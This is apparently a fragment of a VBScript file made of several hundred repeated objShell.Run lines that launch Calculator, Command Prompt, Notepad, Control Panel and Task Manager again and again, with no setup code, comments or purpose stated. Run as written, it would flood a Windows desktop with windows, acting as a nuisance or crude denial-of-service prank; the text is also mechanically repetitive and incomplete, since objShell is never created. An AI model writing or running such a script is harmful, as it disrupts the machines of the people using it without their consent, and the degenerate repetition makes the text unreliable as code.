objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
